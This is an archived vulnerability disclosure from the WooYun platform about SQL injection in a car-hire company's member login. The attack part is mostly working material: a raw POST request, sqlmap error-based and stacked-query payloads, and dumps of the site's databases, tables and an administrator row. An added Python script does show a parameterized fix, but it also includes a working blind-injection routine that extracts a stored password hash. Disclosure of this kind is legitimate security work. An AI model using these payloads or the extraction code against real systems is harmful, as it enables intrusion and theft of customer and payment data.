WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2015-12-16: Details reported to the vendor, awaiting vendor response
2015-12-18: Vendor confirmed; details visible only to the vendor
2015-12-28: Details disclosed to core white hats and relevant domain experts
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public
Nanping Tourism Fleet provides the most comfortable and prestigious airport pick-up and drop-off for travellers. Under its service-first motto, "stay seated at home and the service comes to you", it offers chartered cars for business trips, inspection visits and tourism, giving domestic and foreign business travellers and tourists a safe, convenient and comfortable journey. It emphasises handling luggage on the customer's behalf so that customers feel cared for and valued. It keeps opening new markets and developing transport-related business, and can tailor business and leisure charter services to your needs. Nanping is a quality brand with a philosophy of sustainable operation, insisting on customer first and service above all. Vehicle types include sedans, SUVs, business vans and Mercedes-Benz cars, offering high-end comfort at reasonable prices and stirring up a storm in the domestic travel market! The Nanping fleet uses the original imported European VW T5, whose extra-large luggage compartment suits long-distance routes and golf groups. For your travel safety, every passenger is covered by 5 million in travel accident insurance.
Main site: http://**.**.**.**
SQL injection in the member login (POST request):

POST /web/query_login HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Content-Length: 160
Cookie: PHPSESSID=bh4g1btdu5b9qcahv3beu7dov0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

pwd=c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec&account=admin&pwd_org=admin
sqlmap output:

Place: POST
Parameter: pwd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: pwd=c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec' AND (SELECT 7637 FROM(SELECT COUNT(*),CONCAT(0x3a69626e3a,(SELECT (CASE WHEN (7637=7637) THEN 1 ELSE 0 END)),0x3a75666e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DrmE'='DrmE&account=admin&pwd_org=admin

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: pwd=c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec'; SELECT SLEEP(5);# AND 'WcYk'='WcYk&account=admin&pwd_org=admin

Place: POST
Parameter: account
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: pwd=c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec&account=admin' AND (SELECT 5095 FROM(SELECT COUNT(*),CONCAT(0x3a69626e3a,(SELECT (CASE WHEN (5095=5095) THEN 1 ELSE 0 END)),0x3a75666e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eWMV'='eWMV&pwd_org=admin
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: pwd, type: Single quoted string (default)
[1] place: POST, parameter: account, type: Single quoted string
[q] Quit
>
[11:56:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0
[11:56:10] [INFO] fetching current user
[11:56:10] [INFO] retrieved: nanping@%
current user: 'nanping@%'
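The request and the sqlmap findings above are enough to reconstruct the bug and its fix. The script below is an added example written for this page, not code from the report or from the site. It stands an in-memory SQLite table (schema, account names and passwords are all constructed) in for the MySQL backend, so the MySQL-only error-based trick sqlmap used (a FLOOR(RAND(0)*2) GROUP BY on INFORMATION_SCHEMA.CHARACTER_SETS that forces a duplicate-key error; 0x3a69626e3a and 0x3a75666e3a are the ":ibn:" and ":ufn:" markers sqlmap wraps around the leaked value) is not reproduced. Instead the same injection point is driven as a boolean-based blind oracle, another technique in sqlmap's battery, and used to read a stored hash one hex digit at a time. Two observations from the page are built in: `pwd` is exactly the hex SHA-512 of `pwd_org` (both are sent, so the client-side hash protects nothing), and the stacked-query finding depends on the driver accepting a second statement, which Python's sqlite3 refuses.

```python
import hashlib
import sqlite3

# Constructed stand-in for the site's member table; accounts and passwords are made up.
SAMPLE_MEMBERS = [("admin", "admin"), ("guest", "correct horse battery staple")]


def client_hash(password: str) -> str:
    """Mirror what the login form does: pwd = hex(SHA-512(pwd_org)).

    The request on the page carries both values, so the hash is not a
    secret and offers no protection against injection or replay.
    """
    return hashlib.sha512(password.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory SQLite standing in for the MySQL backend (table layout assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (account TEXT, pwd TEXT)")
    conn.executemany(
        "INSERT INTO member VALUES (?, ?)",
        [(acct, client_hash(pw)) for acct, pw in SAMPLE_MEMBERS],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, account: str, pwd: str) -> bool:
    """Query built by string concatenation: the shape that produces the injection."""
    sql = f"SELECT COUNT(*) FROM member WHERE account='{account}' AND pwd='{pwd}'"
    return conn.execute(sql).fetchone()[0] > 0


def login_hardened(conn: sqlite3.Connection, account: str, pwd: str) -> bool:
    """Same check with bound parameters; attacker input can never become SQL."""
    sql = "SELECT COUNT(*) FROM member WHERE account=? AND pwd=?"
    return conn.execute(sql, (account, pwd)).fetchone()[0] > 0


def blind_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean-based blind oracle through the vulnerable login.

    Injects into `account` as sqlmap did; the OR makes the row count depend
    only on `condition`, and the trailing comment discards the pwd clause.
    """
    payload = f"x' OR ({condition})-- "
    return login_vulnerable(conn, payload, "irrelevant")


HEX_DIGITS = "0123456789abcdef"


def extract_stored_hash(conn: sqlite3.Connection, account: str, length: int) -> str:
    """Recover the first `length` hex digits of a stored hash, one digit at a
    time, using only the login's yes/no answer (at most 16 requests per digit)."""
    recovered = ""
    for pos in range(1, length + 1):
        for digit in HEX_DIGITS:
            cond = (
                f"(SELECT substr(pwd,{pos},1) FROM member "
                f"WHERE account='{account}')='{digit}'"
            )
            if blind_oracle(conn, cond):
                recovered += digit
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {pos}")
    return recovered


def stacked_query_refused(conn: sqlite3.Connection) -> bool:
    """The report's second finding was stacked queries ('; SELECT SLEEP(5);#).
    Python's sqlite3 driver rejects a second statement in execute(), which is
    why that technique depends on the driver and DBMS, not only on the bug."""
    try:
        login_vulnerable(conn, "x'; SELECT 1;-- ", "")
    except (sqlite3.Warning, sqlite3.Error):
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("bypass on vulnerable login:", login_vulnerable(db, "x' OR 1=1-- ", ""))
    print("bypass on hardened login:  ", login_hardened(db, "x' OR 1=1-- ", ""))
    print("admin hash prefix via blind injection:", extract_stored_hash(db, "admin", 8))
    print("stacked query refused by driver:", stacked_query_refused(db))
```

The blind extraction is linear in the hash length (at most 16 requests per digit, fewer with a binary search on the character code), which is how a full 128-character SHA-512 is recovered from a login that only ever answers "yes" or "no". The hardened variant needs no escaping logic at all: with bound parameters the string `x' OR 1=1-- ` is compared against the account column as data and simply fails to match.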
Three databases are involved:

available databases [3]:
[*] hunter75322_nanping
[*] information_schema
[*] test
Database: test [89 tables]
credit_payment
zcs_account_log
zcs_ad
zcs_ad_custom
zcs_ad_position
zcs_admin_action
zcs_admin_log
zcs_admin_message
zcs_admin_user
zcs_adsense
zcs_affiliate_log
zcs_agency
zcs_area_region
zcs_article
zcs_article_cat
zcs_attribute
zcs_auction_log
zcs_auto_manage
zcs_back_goods
zcs_back_order
zcs_bonus_type
zcs_booking_goods
zcs_brand
zcs_card
zcs_cart
zcs_cat_recommend
zcs_category
zcs_collect_goods
zcs_comment
zcs_crons
zcs_delivery_goods
zcs_delivery_order
zcs_email_list
zcs_email_sendlist
zcs_error_log
zcs_exchange_goods
zcs_favourable_activity
zcs_feedback
zcs_friend_link
zcs_goods
zcs_goods_activity
zcs_goods_article
zcs_goods_attr
zcs_goods_cat
zcs_goods_gallery
zcs_goods_type
zcs_group_goods
zcs_keywords
zcs_link_goods
zcs_mail_templates
zcs_member_price
zcs_nav
zcs_order_action
zcs_order_goods
zcs_order_info
zcs_pack
zcs_package_goods
zcs_pay_log
zcs_payment
zcs_plugins
zcs_products
zcs_reg_extend_info
zcs_reg_fields
zcs_region
zcs_role
zcs_searchengine
zcs_sessions
zcs_sessions_data
zcs_shipping
zcs_shipping_area
zcs_shop_config
zcs_snatch_log
zcs_stats
zcs_suppliers
zcs_tag
zcs_template
zcs_topic
zcs_user_account
zcs_user_address
zcs_user_bonus
zcs_user_feed
zcs_user_rank
zcs_users
zcs_virtual_card
zcs_volume_price
zcs_vote
zcs_vote_log
zcs_vote_option
zcs_wholesale
Administrator account:

Table: zcs_admin_user [1 entry]
Columns: action_list, add_time, agency_id, email, lang_type, last_ip, last_login, nav_list, password, role_id, suppliers_id, todolist, user_id, user_name
Dumped row (columns not listed came back empty in the output):
    action_list: all
    email: moonlightff10@**.**.**.**
    lang_type: <blank>
    user_name: 072691148
20 payment log entries:

Database: test
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| zcs_pay_log | 20      |
+-------------+---------+

Booking orders:
Database: hunter75322_nanping
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| car_order | 11      |
+-----------+---------+
Database: hunter75322_nanping
+--------+---------+
| Table  | Entries |
+--------+---------+
| member | 82602   |
+--------+---------+
Sensitive tables involved:

zcs_order_info
zcs_user_account
zcs_email_list
zcs_card
zcs_pay_log
zcs_admin_user
But after running for most of the day I still haven't seen any large data set. What's going on?
Severity: High
Vulnerability Rank: 17
Confirmed at: 2015-12-18 19:25
Thanks for the report.
None.